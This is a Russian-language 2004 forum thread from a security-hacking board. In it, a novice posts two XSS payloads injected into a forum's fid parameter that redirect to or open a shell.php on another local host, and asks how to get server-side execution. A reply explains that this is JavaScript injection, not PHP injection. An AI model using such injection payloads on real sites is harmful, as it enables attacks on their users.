HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Межсайтовый вызов скрипта
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Межсайтовый вызов скрипта
  #1  
Старый 26.11.2004, 05:00
ProTeuS
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,367
С нами: 11291486

Репутация: 2175


По умолчанию Межсайтовый вызов скрипта
Хай, пиплс!
Помогите нубу разобраться...

Пытаюсь удаленно обращаться с форума в локалке на скрипт на своей та4ке и хз 4е не выходит =(


http://10.8.1.207/showforum.php?fid="><script>location.href="http://10.8.1.119/shell.php"</script>
или
http://10.8.1.207/showforum.php?fid="><script>window.open("http://10.8.1.119/shell.php")</script>

Может я в 4ем-то не врубаюсь, но этот код выполняется с правами клиента в моем браузере, а как замутить, 4тобы он исполнялся с правами системы на машине форума???
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 26.11.2004, 18:14
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
С нами: 12604706

Репутация: 0


По умолчанию
[QUOTE]
Цитата:
как замутить, 4тобы он исполнялся с правами системы на машине форума
В данном случае никак, поскольку ты описываешь javascript-injection, а тебе нужно php-injection.
 
Ответить с цитированием

  #3  
Старый 27.11.2004, 03:24
ProTeuS
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,367
С нами: 11291486

Репутация: 2175


По умолчанию
[QUOTE=Algol]
Цитата:
В данном случае никак, поскольку ты описываешь javascript-injection, а тебе нужно php-injection.
Сенкс, теперь более-менее разобрался...
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.